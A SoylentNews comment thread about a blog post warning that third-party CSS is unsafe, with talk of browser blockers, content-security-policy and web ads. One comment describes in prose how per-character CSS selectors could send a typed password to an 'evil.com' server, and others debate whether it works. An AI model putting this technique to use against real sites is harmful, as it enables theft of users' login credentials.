SoylentNews is people
SoylentNews
Jake Archibald writes in his blog about the bigger problem presented by importing third-party content into web pages. Even CSS is a problem as a CSS keylogger demo showed the other day.
A few days ago there was a lot of chatter about a 'keylogger' built in CSS.
Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'.
While most are acutely aware, yet ignore, the danger presentd by third-party javascript and javascript in general, most forget about CSS. Jake reminds us and walks through quite a few exampled of how CSS can be misused by third-parties exporting it.
Source : Third party CSS is not safe
(Score: 1, Informative) by Anonymous Coward on Wednesday February 28 2018, @06:21PM (21 children)
Why should I trust a website in the first place? NoScript applies to the website I am visiting as much as it does to anything it implements from a 3rd party.
(Score: 4, Informative) by RS3 on Wednesday February 28 2018, @06:30PM (20 children)
NoScript doesn't stop 3rd-party css. Here's an example from a dice.com page:
link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto+Condensed"
(Score: 3, Interesting) by zocalo on Wednesday February 28 2018, @07:02PM (4 children)
UNIX? They're not even circumcised! Savages!
(Score: 5, Informative) by zocalo on Wednesday February 28 2018, @07:15PM (3 children)
* * css allow
to:
* 1st-party css allow
click "Save", then click "Commit".
UNIX? They're not even circumcised! Savages!
(Score: 3, Informative) by RamiK on Wednesday February 28 2018, @07:49PM (2 children)
Just install uMatrix+uBlock instead of NoScript+AdAway and get the same feature-set but with a UI that lets you allow/disallow CSS per-domain or even sub-domain with four clicks of the button.
compiling...
(Score: 0) by Anonymous Coward on Wednesday February 28 2018, @10:14PM (1 child)
NoScript protects far more than just JavaScript. Sadly you still need all three. All have unique features.
(Score: 2) by RamiK on Wednesday February 28 2018, @11:18PM
The clickjacking protection is covered by the CSS blocking while the XSS and anti-tracking protection is covered by the XHR.
The additional functionality NoScript also packages is extra scripts that circumvent specific ad-walls. But not only those scripts are fragile and break every other day (literally as ad-wall operators are actively combating NoScript and AdAway), when they break they live your client running all the scripts, displaying the ads, and letting viruses through.
Other than that, citation needed.
compiling...
(Score: 2, Informative) by nitehawk214 on Wednesday February 28 2018, @07:58PM (3 children)
uMatrix does not block 3rd party CSS by default. You can enable it, but it breaks nearly every website.
"Don't you ever miss the days when you used to be nostalgic?" -Loiosh
(Score: 3, Informative) by DannyB on Wednesday February 28 2018, @08:59PM (1 child)
A fun uMatrix tip.
I've noticed a number of anti-adblocking sites. I go to their page and the site briefly appears, and then is immediately replaced by a fully white background that says
Something interfered with this website loading.
I simply turn off 1st party scripts, refresh, and everything seems good.
In the past, and for years, in some cases I could simply View --> Page Style --> No Style. But no longer.
uMatrix is so much better than AdBlock -- if you are a geek. It gives you a lot finer control. The ability to individually indicate whether to accept cookies, frames, CSS, HTML, media, even XHR from any site that the page attempts to load from.
When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
(Score: 0) by Anonymous Coward on Thursday March 01 2018, @12:41AM
uBlock's eye dropper tool lets you block individual elements like those.
(Score: 0) by Anonymous Coward on Thursday March 01 2018, @03:27AM
Those websites were broken long before a user with uMatrix came along.
Yes, 85% of the web is defective by design. Welcome to 2018.
(Score: 3, Informative) by tangomargarine on Wednesday February 28 2018, @08:24PM (1 child)
RequestPolicy even blocks first-party CSS, so I would think they probably block third as well.
I run AdBlock*+NoScript+RequestPolicy on Pale Moon.
*whatever the generic version for PM is called
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 0) by Anonymous Coward on Saturday March 03 2018, @05:47AM
Thank you! I grabbed RequestPolicy 0.5.28 straight from Mozilla's add-on site for Firefox [mozilla.org] and it worked link a champ straight away in Pale Moon. (I had already been running "NoScript" and "Adblock Latitude" add-ons for Pale Moon.)
No more unapproved whacky third-party CSS for me!
(Score: 0) by Anonymous Coward on Wednesday February 28 2018, @08:28PM (8 children)
This is such a non-issue for browser users, there's hardly any point in blocking 3rd-party CSS at the browser level.
This "CSS keylogger" depends on Javascript code running on the page to actually capture any keystrokes -- that script has to assign them to an element attribute so the CSS attribute selector can act upon it. Apparently some "web frameworks" do exactly this with password input elements, thus enabling styles to depend on the user's keystrokes in certain situations. Since styles can request external resources, a malicious stylesheet can make the user's browser reveal which styles were applied.
Sometimes servers send various secrets in attribute values (usually in hidden input elements). A stylesheet could potentially exfiltrate those values in a similar manner, without depending on any Javascript.
(Score: 4, Informative) by DannyB on Wednesday February 28 2018, @09:15PM (7 children)
It didn't seem to me like any JavaScript was required. Did you see the CSS example in TFA?
Suppose you had a single input field <input type="password"/>
In the example CSS . . .
This CSS, without any JavaScript, would match your input field named "password". It would match only if the value in the password ended in the letter "a". If so, it would fetch a URL ending in "a".
Now duplicate that 3 line snippet, and replicate it for every character you might type as a password. Send this CSS stylesheet to the browser.
Now, as you type each character of your password into the field, the "last character" of the field will match a different style rule, which will trigger loading a different background image from the URL. Now, all background images returned could be a 1x1 pixel transparent PNG. My evil.com server will get the URL hits asking for the transparent image for each character of your password as you type it.
I could further augment this stylesheet to have a similar set of rules, but to slightly different URLs so that I could capture every character you type into the "username" field as well.
I simply log all these URL hits in my database. I sort them by IP address, then by time. I'll notice a number of character hits, from you, grouped together in short time intervals (when you were typing), first in the username field, then in the password field. Poof! I now have your login credentials -- by sending you nothing more than a CSS file!
That's almost as fun as monkeying with some Microsoft fanboy's Visual Studio .h files
When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
(Score: 2, Informative) by Anonymous Coward on Wednesday February 28 2018, @11:24PM (3 children)
No, this does not work as you describe. The CSS attribute selector is based on the element's value attribute in the DOM, which does not depend on what the user types. Try it and see -- this selector simply does not match your example element since it has no value attribute.
With your example input, there is no value attribute, so the selector is not matched. Javascript is required to update the DOM in order for the style to be applied "dynamically". Alternately, the server could send a value attribute to start with (for example, <input type='password' value='endswitha' />, but this is static and also not changed by user input.
(Score: 2) by coolgopher on Thursday March 01 2018, @12:37AM
And this is where the comment about this attack largely depending on React like frameworks, where it's very common to make a control "managed" by keeping the authoritative state outside of the DOM and injecting it as-needed via the value="xyz" attribute of the control.
(Score: 2) by DannyB on Thursday March 01 2018, @02:34PM (1 child)
Okay. So I just now constructed a trivial example, and you're right. I cannot get this to happen.
A page H1.html:
And a responder H2.jsp:
Now my responder does not return an image. But it does print on the server's console when a request is received, and what the "char" parameter value is.
By manually invoking the URL from the browser's address bar:
I can get the server's console to print out:
But not by typing in the password field. I also tried changing the field type from password to text.
I tried in Chrome, FireFox, IE and Edge.
I also tried "relative" URLs rather than fully qualified URLs that specify the https and server name.
So I must be misunderstanding something in TFA.
When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
(Score: 0) by Anonymous Coward on Tuesday March 06 2018, @08:15PM
Styles can depend on the state of the DOM, and Javascript can update the DOM (and therefore cause style changes). Without Javascript, the DOM is fixed once the document is loaded and, for the most part, so are styles (the exceptions are certain pseudo-classes like :visited and :checked).
In TFA, the 3rd-party stylesheet is "leaking" the state of the DOM, which is updated by some 1st-party Javascript libraries. This could be a problem for website operators because they may be giving more control of their site to third parties than they imagined. (Although even without this kind of information leak stylesheets have almost total control over the document's presentation and malicious styles can do all sorts of nasty things).
But the reason I say this is an almost total non-issue for browser users is because third party content doesn't really change the story for them. Either the site is logging keystrokes or it is not. Whether that's done by 1st-party or 3rd-party scripts/styles/whatever doesn't really matter.
(Score: 2) by julian on Wednesday February 28 2018, @11:33PM (1 child)
That's brilliant and terrifying.
The web was a mistake.
(Score: 2) by FatPhil on Thursday March 01 2018, @10:09AM
It was introduced in CSS2, and fixed in CSS2.1
And now they brought it back, because repeating mistakes is hilarious.
https://blog.mozilla.org/security/2010/03/31/plugging-the-css-history-leak/
Great minds discuss ideas; average minds discuss events; small minds discuss people; the smallest discuss themselves
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:05AM
-d
After seeing this in someone's source I always employ it myself. I can't be bothered to use #error:
#if this
#elif that
#elif those
#else
you
lose
#endif
Don't say I never did nothin' fer ya.
Yes I Have No Bananas. [gofundme.com]
(Score: 5, Insightful) by Justin Case on Wednesday February 28 2018, @06:33PM (12 children)
Between malice and incompetence, almost everything that uses electricity is getting damn hard to batten down.
Trusty old desktop went belly up this week. Looking for a new one, almost all of them (so far) have built-in wireless that can't be hardware-switch disabled.
A Garmin GPS I bought less than a year ago fried its internal file system. You can't just pop an SD card and replace it with a good backup, because Garmin does not want their shitty proprietary software copied, not even by the legitimate buyer.
Increasingly web sites don't work on any sane defensive configuration.
My bank is requiring me to do things using an app or a website, both of which are impossible to audit much less trust. Same for my health insurance company.
I am increasingly understanding that RMS has been right all along, and about the only option remaining is to go full Amish.
(Score: 2) by RS3 on Wednesday February 28 2018, @06:46PM
Isn't that nice of them to give you all of that foolproof goodness built right in? I'll lend you a soldering iron. Frankly the antenna chip would be very easy to pry off, if done carefully. An X-acto knife will also fix it.
Time to go bank shopping! A federal credit union might be much better.
(Score: 0) by Anonymous Coward on Wednesday February 28 2018, @06:51PM (3 children)
You just need a handy little tool [uline.com]...
(Score: 3, Funny) by maxwell demon on Wednesday February 28 2018, @07:20PM (2 children)
To cut the wireless wires?
The Tao of math: The numbers you can count are not the real numbers.
(Score: 3, Funny) by nitehawk214 on Wednesday February 28 2018, @08:07PM (1 child)
I used a wireless wirecutter to cut the strings of my air guitar.
"Don't you ever miss the days when you used to be nostalgic?" -Loiosh
(Score: 0) by Anonymous Coward on Wednesday February 28 2018, @10:53PM
why not build one? or get a brand name a few years old...?
i only have one desktop with wifi built in, and that is from 2006. everything else doesn't and I run a cable to them. laptops have had wifi integrated into them for years now though, for more of a good reason than desktops.
(Score: 0) by Anonymous Coward on Wednesday February 28 2018, @08:43PM (4 children)
Okay, I'm confused now... why is this a problem?
Put another way, I assume you have never audited the internal systems of their system. Yet you still are willing to go to a branch and deposit money, or rely on direct deposit or something else.
If you are willing to trust a bank to handle things there, why would you not trust them on a website or an app. To be clear, they can be broken... but then the bank is on the hook to fix it and make reparations.
(Score: 5, Informative) by Justin Case on Wednesday February 28 2018, @08:51PM
Because they want to execute their crap code on my hardware, exposing my data including data that has nothing to do with them. They won't be "on the hook" for the damage they cause; they will be oblivious. Like most of their customers.
(Score: 4, Informative) by lentilla on Wednesday February 28 2018, @09:02PM
The reason this isn't a problem is that when the bank robbers turn up and steal all the cash, they are stealing the bank's cash, and the bank still owes you the money you have loaned to them. Chances are good you'll get your three bucks and fifty-one cents, or whatever happens to be in your account.
For the same reason I don't invite those robbers back to my place for a cuppa and all my cash and goodies. It's simply a matter of exposure. Not to mention banks tend to have security people whose sole job it is to make sure their cash and their systems are secure. Ordinary people can't be expected to be full-time ordinary people and security experts. And even assuming they wanted to: auditing secret software is difficult - by the unlikely chance it's even allowed by the terms of service.
No, the grandparent has good reason to be wary.
(Score: 2) by Arik on Thursday March 01 2018, @12:07AM
If laughter is the best medicine, who are the best doctors?
(Score: 1, Touché) by Anonymous Coward on Thursday March 01 2018, @02:43PM
When was the last time you sued your bank?
(Score: 2) by DannyB on Wednesday February 28 2018, @09:29PM
I've heard about strange things Banks do on the web.
Most likely they are trying to protect ${ you | themselves } from someone pretending to be you when logging in to your account.
They do this in all sorts of ways. Sometimes by using "something you know" that is not a password. Maybe "something you know" like a series of animal pictures. The pictures are presented in random order, but if you click the bird, the squirrel, then the ostrich, you must be the right person. Some other malicious JavaScript on the page won't get anything by key logging. And would have to be specially tailored to know about this picture technique, and discover the random arrangement of the images this time, and which ones you clicked.
Some even use (yuk!) Java Applets -- in an effort to hide their authentication attempt within a different execution environment. Nevermind how bad an idea it was, in hindsight, to ever have allowed any ${ Applets | ActiveX | Flash | Silverlight } that can interact with JavaScript on the page. What could possibly go wrong?
When trying to solve a problem don't ask who suffers from the problem, ask who profits from the problem.
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:09AM
You may have at least heard of Oracle's "Cover Oregon" clusterfuck.
After it had been - cough - "Live" - cough - I tried to use it to sign up for Obamacare from my MacBook Pro.
When was this? 2014 or some such. Anyway a long time since Microsoft claimed to have surrendered to the HTML validity wars.
Cover Oregon required Internet Explorer. It's not available for Mac OS X.
Eventually the state sued Oracle, Oracle sued the state, and the state started using healthcare.gov.
Meanwhile Washington's Obamacare sight works just fine.
Yes I Have No Bananas. [gofundme.com]
(Score: 2) by RS3 on Wednesday February 28 2018, @06:41PM (15 children)
All of this code-bloating functionality being added to webpages and browsers, and we have to bloat some more with add-ons, extensions, and plugins just to stop all of it. If only someone would make a slimmed-down simplified browser... let's name it, I don't know, maybe something hot and sly. (cough cough)
"disable-HTML" purports to block several things including css. Trying it now... seems to work! Here'a link for chrome-based browsers:
https://chrome.google.com/webstore/detail/disable-html/lfhjgihpknekohffabeddfkmoiklonhm?hl=en-US [google.com]
"uMatrix" also does this, well. I like it, but it's a bit of work to teach it.
(Score: 1, Interesting) by Anonymous Coward on Wednesday February 28 2018, @07:05PM (11 children)
I could have sworn that disabling external fonts was a standard feature in at least one browser. Disabling CSS should be easier. Custom stylesheets might require a plugin.
(Score: 2) by maxwell demon on Wednesday February 28 2018, @07:23PM (10 children)
Indeed, Firefox has an option for it right in its menu (or maybe had? I don't know what changed in the latest versions).
The Tao of math: The numbers you can count are not the real numbers.
(Score: 1, Informative) by Anonymous Coward on Wednesday February 28 2018, @09:27PM (5 children)
Unfortunately nobody knows how to design webpages anymore. The entire layout breaks down because it's some garbage hammered together in a manner wherein the layout isn't preserved if styles are turned off (properly designed HTML pages of ages past would render correctly because devs didn't assume the web was some majical WYSIWG thingamabob).
(Score: 4, Interesting) by lentilla on Thursday March 01 2018, @02:24AM (4 children)
No, the websites of today are far better than those of the past.
I do; however; understand how you have reached the conclusion that "nobody knows how to design webpages anymore". In the past; if you "turned off styles", the most that would likely happen is the text was in black-and-white, the fonts lost their bling, but the page more-or-less looked the same. The graphics stayed put and the page layout was basically the same. Now-a-days, "turn off styles" and the entire page falls apart - everything in a single long column and stuff that was on the right-hand of the page now appears at the bottom of the column.
That is by design. In fact, it was the web-designers of the past who were in error. (It wasn't their fault - more on that below.)
You remember all that high-minded talk about separation of content and presentation? Well, in the bad old days, it really was just talk. Due to the horrid compliance to web "standards", the only way a web designer could make a webpage stay together was to use nasty little tricks. (Microsoft's Internet Explorer holds the lion's share of the blame here.) Web-design was pretty much the antithesis of programming - nothing was deterministic, and the page would render ten different ways in five different browsers and sometimes changed depending on the wind.
The main dirty tricks used in the past were tables and frames. Whilst it worked (sort-of), doing so created an entire class of other problems. Fragility was one. Remember "Best designed for Internet Explorer at 800x600 resolution"? Yuck. The other big looser was semantic context. Our brain is pretty good at turning a page into information, but I would have hated to rely on a screen reader to parse a single webpage. Today, despite the seemingly random jumble of text when styles are turned off, the page is much more transparent to screen readers and other automated systems.
So time moved on and today we have HTML5. Which; for anyone who was forced to design webpages in the past; is a thing of true beauty. It follows the "principle of least surprise" (mostly), the language can be regular (you can treat it as XML and validate your code - yeah, can you imagine a programming language where nobody could tell you if it was syntactically correct? Yep, that was HTML in the past.) Semantic tags allow us to identify the purpose of content on our page. One example is having "navigation section" tagged with a <nav> tag which is immediately obvious to screen readers.
CSS ("styles") go hand-in-glove with HTML5. The HTML describes the content and the CSS describes the presentation. After years of being a pipe-dream it's more-or-less possible to achieve separation. On the first level, CSS allows the designer to specify fonts and colours. On the second level, there is something called the "box model" which allows placement of elements of the page. On the third level, a properly designed page will flow correctly no matter what size the page is being rendered on. Like was originally intended - before HTML in reality became a bastardised version of a PDF that would break when the wind changed.
The downside to all this magic is that the webpage falls apart when styles are turned off. Trust me, it only falls apart visually. (Unsurprising, since you turned the "visual" part off.) At the same time, the page remains utterly readable to machines.
Having a webpage fall apart is a worthwhile price to pay. So many, many man-years of programmer time were wasted in the intervening years.
(Score: 0, Touché) by Anonymous Coward on Thursday March 01 2018, @04:03AM
Ha! Good one. Oh, wait, you're serious?
BWAAAHAHAHAHAHAHAHAHAHAHAHA!
(Score: 4, Insightful) by maxwell demon on Thursday March 01 2018, @06:57AM (1 child)
The number of properly designed pages is very low. And many current web sites are a load of JavaScript anyway, and without JavaScript, you get displayed none of the content (how does that work with screen readers?) And those which aren't typically have a hard-coded width; if shown on a big window, you just get loads of blank on both sides; even worse, if the font is too small on your display and you magnify it, the column doesn't get wider, but there just fits less text on that tiny column.
No, the good old time was when web designers didn't yet exist. People would write web pages that worked well without placement. Yes, browsers would render them slightly different, but that was expected and didn't matter, because the pages just contained the information.
Now in theory, using CSS you can write designed web pages that don't fall apart when CSS is disabled. No, you won't get fancy designs that way, but things can be in a logical order, and there are still the logical tags like h1, h2, em, strong, etc. It's just that few people care to do that. So in theory, CSS was a godsend. But in reality, web designers don't use it well.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 2) by Pino P on Thursday March 01 2018, @10:00PM
According to Mother Effing Tool Confuser [mothereffingtoolconfuser.com], web browsers that output speech execute JavaScript in the same way as visual ones. They just use the stylesheet's voice properties instead of its visual properties, and they use ARIA attributes to announce important elements to the user.
(Score: 0) by Anonymous Coward on Thursday March 01 2018, @03:49PM
Yes, instead in our brave new world we have "Best viewed with Google Chrome", alongside myriads of CSS hacks meant to work around browser specific deficiencies (that bog down every other browser by virtue of being forced to log and deal with invalid CSS not meant for it), webpages composed of 40+ layers of nested content-less divs, AJAX that silently loads page components and mysteriously breaks if a connection times out, web pages trying to do the browser's job and lazy-load images (so now we can't even get images w/o scripting).
...as for it being easier for machines to understand webpages. If this were actually the case we would be seing an uptick in browser diversity, instead there're really just one rendering engine to rule them all now (with the remaining alternatives milling about in a morass of increasing irrelevance).
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:15AM (3 children)
otherwise I can't log in to one of my very favorite websites of ill repute.
After doing this too many times I just switched to Chrome.
Yes I Have No Bananas. [gofundme.com]
(Score: 2) by RS3 on Thursday March 01 2018, @02:11AM (2 children)
Have you tried Vivaldi? I'm using it a lot (like now). It's chrome-based, and I think it's slightly faster, but I haven't done a 1-to-1 comparison. Most software, cleaners, plugins, etc., see it as chrome. I just like the UI and settings better.
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @07:39AM (1 child)
I'll give it a try this weekend.
Really I prefer Safari to Chrome. Hopefully I will prefer Vivaldi to Safari.
Safari doesn't have an API for Add-Ons.
Yes I Have No Bananas. [gofundme.com]
(Score: 2) by RS3 on Thursday March 01 2018, @03:07PM
You're so kind, thank you. There are too many browsers out there. I've been using Dolphin on Android (when I'm not near a bigger computer) and it's pretty cool. I've also been using Opera Mini on Android. Ever since a Chinese company bought Opera I'm cautious- nothing involving $, personal info, logins, etc., is done on Android.
I do use Safari on MacOS, but I've never tried it on PC.
I'm curious how you like Vivaldi. They update it fairly regularly. I'm not a fan of auto-updaters, and every time you update Vivaldi it turns on: (upper-left "V" button) --> Tools --> Settings --> Updates --> Notify About Updates, which just starts and runs update_notifier.exe.
Extensions I have installed (there are so many available), but not necessarily turned on, are:
Adblock Plus
AdGuard AdBlocker
DuckDuckGo Privacy Essentials (DuckDuckGo is the default web search for Vivaldi)
Fair AdBlocker
Fair AdBlocker App
Fair Ads
Script Blocker for Chrome
Script Defender
Extensions I have installed and usually turned on:
disable-HTML
HTML5 Video Autoplay Blocker
Disable HTML5 Autoplay
Privacy Badger
uBlock Adblock Plus
uBlock Origin
uBlock Origin Extra
Video Blocker by plowman
Awesome extension, on when I'm super-cautious, bit of a learning curve including that you teach it as you go:
uMatrix
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:14AM (2 children)
"One of my customers complained that his computer was slow. He had nine toolbars." -- Thomas Leavitt [880itservices.com].
You can make something foolproof but you can't make it damnfool-proof.
Yes I Have No Bananas. [gofundme.com]
(Score: 2) by maxwell demon on Thursday March 01 2018, @07:01AM (1 child)
There is no inherent reason why a toolbar should make your computer slow (unless you are low on memory). A well-designed toolbar should just sit there until you use it, without eating resources (other than the little that is needed to display it; but note that otherwise something else would be displayed at that place).
The Tao of math: The numbers you can count are not the real numbers.
(Score: 3, Touché) by MichaelDavidCrawford on Thursday March 01 2018, @07:37AM
I Rest My Case.
Yes I Have No Bananas. [gofundme.com]
(Score: 3, Insightful) by bzipitidoo on Wednesday February 28 2018, @06:46PM (1 child)
Big, supposedly reputable organizations have given me more trouble than petty criminals. Big is what makes them so hard to stop, and they know it. They don't use script kiddie hacks, CSS vulnerabilities, or whatever other trickery to rob you, they do it all nice and legally if not morally. What do you do when your ISP hikes your rates, again? Changes the terms to add new limits with big penalties or fees for exceeding them? You sure can't complain to the police that you're being robbed. So, do without Internet access? Or suck it up?
As for CSS vulnerabilities, simply employing sandboxes seems an easy technical fix. Sure is a lot easier to whip up a sandbox than sue Big.com.
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:19AM
Not long after some Fortune 500 corp acquired XenSource, they redirected all its URLs to its own domain.
Now all those old URLs 404. They never even tried to redirect them to content that might result in a sale.
That kind of thing is quite common when the web designers don't have to panhandle for spare change - or sing on the street:
Whenever I want to remove a resource, I make damn sure it redirects to something useful.
Yes I Have No Bananas. [gofundme.com]
(Score: 5, Interesting) by requerdanos on Wednesday February 28 2018, @06:49PM (15 children)
I am webmaster and/or server admin for several sites. The ones where I have editorial control and decision-making power, I eliminate third-party content as a standard practice.
But some (a wordpress full of plugins, for example) just don't work that way because of the toxic phone-home viewpoint pervasive in the technology industries.
Just as your home automation used to be, years ago (think X10), based on devices you own that do their work in your home, and now are expected to be on devices (think Alexa) you license, who do no work but simply turn everything over to their masters back at the home office, so website features used to be things that you coded into your website, that ran on your server, but now are expected to be simply references to some master back at the home office on a third party server.
In both cases, I think this is the wrong way to go.
Google fonts/analytics? bzzt. I request fonts in css with graceful fallback to sans, serif, mono, etc, and analyze my web logs.
Just insert this iframe ad code? Bzzt. If I want to add a link, I add a link, not an iframe. I am working on writing an ad distribution network where the ads live on the server and are part of the web site that displays them, and are counted by tiny graphic elements within the ad that the user can cheerfully choose to not load, just like the ads themselves which will be clearly delineated with something like <div id="here-be-ads-matey">.
This handy web 2.0, 3.0, 9.0 widget, just add this code to call the javascript code on our servers? Bzzt. This is the wrong approach!
I wish the people that made web pages would adopt this view. It affects everyone who looks at a web page, but the page makers are the group that accept or reject these technologies in a way that makes them successful or not.
If that doesn't happen, then third-party content being unsafe will still be true, but will remain unavoidable. Because it is completely avoidable, that would be a security-hating shame.
(Score: 3, Insightful) by Arik on Wednesday February 28 2018, @07:07PM (5 children)
The only way I can see, at this point, to force any sort of sane web practices would be for browsers to start enforcing sanity and after so many years of bending over backwards in the other direction that doesn't exactly seem likely. As long as they can get away with it, they're going to keep doing it, and what's more bad eventually drives good out of the market in that situation - each year fewer and fewer people will bother to pay for skilled labor to do it right when they see everyone else has gone cheap and gets away with it.
If laughter is the best medicine, who are the best doctors?
(Score: 4, Informative) by requerdanos on Wednesday February 28 2018, @07:51PM (2 children)
Some of our big browser vendors are Microsoft "You Will Be Windows Ten-ilated; resistance is futile" "Meet Cortana!" and Google "Hey Google, how are your analytics looking for my sites and their googlefonts?"
So, yeah, no, not likely-looking.
It's not just apathy among coders. The decision makers are often intelligent people who are really good at what they do (but it isn't IT, it's fixing cars, or practicing law, or doing surgery, or practicing medicine, etc.).
These people, having management skills, hear "That great (tool|technology) you read about isn't a good fit for your site because it requires dependence on third party inclusions." And they say something like "But if you just did what I said, it would work fine, and most people don't care, right? Get to it if you want to keep getting paid."
It's like why people who otherwise wouldn't choose to still run Microsoft operating systems. Their job/executive funding source doesn't want to lead anyone to freedom, they just want to lead their company to income, and technology that doesn't respect anyone or anything is widely accepted to a degree that it's easy to just use it and say "it was industry best practices. I was doing good for my company."
Stallman, who is an admitted nut, is right on this. If you agree, tell him so [fsf.org].
(Score: 3, Insightful) by Arik on Thursday March 01 2018, @12:11AM (1 child)
Time has proven me wrong. If anything, he's minimized it.
If laughter is the best medicine, who are the best doctors?
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @12:59AM
What appeared to be "resume.doc" on my website used to link to the above essay.
I put that link on my website roughly twenty years ago. The recruiters still ask for word resumes.
It eventually occurred to me that their resume retrieval applications were hardwired to parse word .doc documents. For word attachments to become a thing of the past, all those body shops would need new versions of those applications. For that to happen, those applications' vendors would have to lift a finger.
I finally sidestepped the problem by removing my resume from the web. Its old URL still works but it redirects to my homepage.
Yes I Have No Bananas. [gofundme.com]
(Score: 3, Insightful) by el_oscuro on Thursday March 01 2018, @01:52AM (1 child)
They do. It's called content-security-policy. If a website implements it, it nukes XSS from orbit. your browser literally says "fuck you" to any in-line or unknown third party JavaScript. The reason it isn't implemented is because it totally breaks the shitty ad model. Websites would have to *actually* host their own ads or at least know exactly where they came from.
SoylentNews is Bacon! [nueskes.com]
(Score: 2) by canopic jug on Thursday March 01 2018, @06:08AM
Or they could just do ads without infecting viewers with javascript. There's no technical reasons that the ads could not be plain PNG, JPEG, or GIF. I'm not sure about APNG but maybe that too. On the other hand there are many reasons not to include scripts, especially from the viewpoint of those targeted to receive said scripts. There is now even a word for the malware that spreads through the advertisements, malvertising [wired.com], and it's not a new thing either.
Brendan Eich, who developed javascript, himself even says you should block javascript used for 3rd party trackers, fingerprinting, and ads. Though that is said as part of his promotion of his new browser, Brave [brave.com].
Money is not free speech. Elections should not be auctions.
(Score: 2) by stretch611 on Wednesday February 28 2018, @09:49PM (2 children)
Unfortunately, many web "developers" rely on 3rd party code as a crutch. If they did not use 3rd party content they would have to write the code themselves.
Even the developer of the linked article uses 3rd party content... He has commenting provided by Disqus. (I did not try to look for any, but that was obvious.)
Now with 5 covid vaccine shots/boosters altering my DNA :P
(Score: 2) by requerdanos on Wednesday February 28 2018, @10:13PM
Well, I believe that's because of this pervasive phone-home mindset.
Before that mindset took hold here, it was "If they did not use third party content then they would have to copy and paste the code into their own site."
Since having things work autonomously on the server of the website is no longer important, most code doesn't work nowadays unless it's in touch with the mothership.
I am kind of anti-mothership. Snowden is a hero.
(Score: 0) by Anonymous Coward on Thursday March 01 2018, @02:45PM
I've started to use third party CSS, but it is served from my servers rather than use a CDN.
I'm.. not sure if this counts as bad or not (from your point of view).
I will totally admit it is a crutch though. I find CSS very frustrating to work with and since I started using this framework, I've finished doing CSS-related stuff and still been in a good mood at the end of it!
(Score: 2) by el_oscuro on Thursday March 01 2018, @02:12AM (5 children)
I am also a webmaster, and would love to have ads that I host myself. I you have something, I am definitely interested. I'm hoping to fully implement content-security-policy [google.com], which completely nukes XSS and any other shitty third party content. It also nukes the shitty ad model website use today, which is literally written in XSS.
SoylentNews is Bacon! [nueskes.com]
(Score: 2) by Pino P on Thursday March 01 2018, @10:14PM (4 children)
I agree that web ads are broken. But what not-broken revenue model would you prefer?
(Score: 2) by Justin Case on Thursday March 01 2018, @10:56PM (3 children)
None.
Maybe you consider that "broken", but the web was a lot better before all the fast-buck artists showed up.
People who thought they had something worth saying paid a few bucks a year for web hosting to get their message out, or share their software, or whatever they'd created that seemed worthwhile to them. Participants in this "sharing economy" invariably got a thousand times more out than they put in, and the freeloaders weren't much of a burden.
Then a billion assholes showed up, all thinking "how can I get rich from other people's work?" and it has plummeted downhill like a rocket-powered bobsled ever since.
Our big mistake was making it easy for idiots. We need to return to the days when a little technical knowledge was required as a small barrier to entry.
(Score: 2) by Pino P on Friday March 02 2018, @01:54AM (2 children)
A return from a commercially dominated web to a hobbyist-dominated web would decrease the demand among viewers for Internet access, which would in turn make it no longer economical for your ISP or its competitors in your area (if any) to continue to offer high-speed Internet access at an affordable rate.
(Score: 2) by Justin Case on Friday March 02 2018, @12:59PM (1 child)
You don't need high speed when a page is only 40K. And it was not only affordable, you had many providers to choose from, which kept prices down and service up.
(Score: 2) by Pino P on Friday March 02 2018, @03:59PM
Though dial-up was competitive, you did need a POTS line, and many households have long since given that up in favor of a cellphone.
How would amateur video be transmitted over such an infrastructure? Mail order DVD+R?
(Score: 2) by Azuma Hazuki on Wednesday February 28 2018, @09:33PM (1 child)
I *just* a few days ago started teaching myself (X)HTML, CSS 3, and PHP.
Upon learning that it was possible to include CSS (among other things...) from other sites, that set off an immediate red flag, and I resolved to host everything locally if at all possible. It made me think "No, that sounds like the mother of all XSS vulns..." Glad to see this intuition isn't misplaced; seems my constant paranoia is actually useful in the world of computing!
I am "that girl" your mother warned you about...
(Score: 0) by Anonymous Coward on Wednesday February 28 2018, @11:02PM
yeah. the days of 'cross-site domain scripting is bad' are very much over.
no ad revenue with that approach.
(Score: 2) by Freeman on Wednesday February 28 2018, @09:47PM (1 child)
Third-party content is inherently unsafe, because you're not in control of the content. Though, pretty much the *Internet* is unsafe and should be treated like it has Ebola when interacting with it. That being said, I was a little curious as to how someone made a keylogger using CSS. To which the answer is, they didn't. They just passed the React keylogger in using CSS. Bottom line, if it's not hosted on your site, you can't rely on it.
Joshua 1:9 "Be strong and of a good courage; be not afraid, neither be thou dismayed: for the Lord thy God is with thee"
(Score: 2) by requerdanos on Thursday March 01 2018, @12:30AM
It does in fact have Ebola [wikipedia.org]. It has all the hemorrhagic fevers.
(Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @12:50AM (1 child)
By now an ancient build of Safari had the best thing since sliced bread: the Activity window. It listed all the URIs that composed each web page, how big they were as well as their progress toward downloading.
I was dismayed to see a whole lot of stuff like this:
http://code.google.com/jquery/jquery.js&id=12345678 [google.com]
Sometimes the query parameters had names that made their defeat of caching even more apparent.
A helpful contribution the Open Sores community could reasonably make would be a browser add-on that replaced such URL parameters with the empty string. Not only would that make browsing much faster, it would make life much easier for closeted gay Republican politicians.
Political campaign websites are by far the worst. None of them are satisfied with using just one analytics "service" - they have to use them all. So just by checking out who's running for city council, you'll be downloading eight different web bugs.
Yes I Have No Bananas. [gofundme.com]
(Score: 1, Informative) by Anonymous Coward on Thursday March 01 2018, @01:13AM
You can do that with a userscript in a couple of minutes.
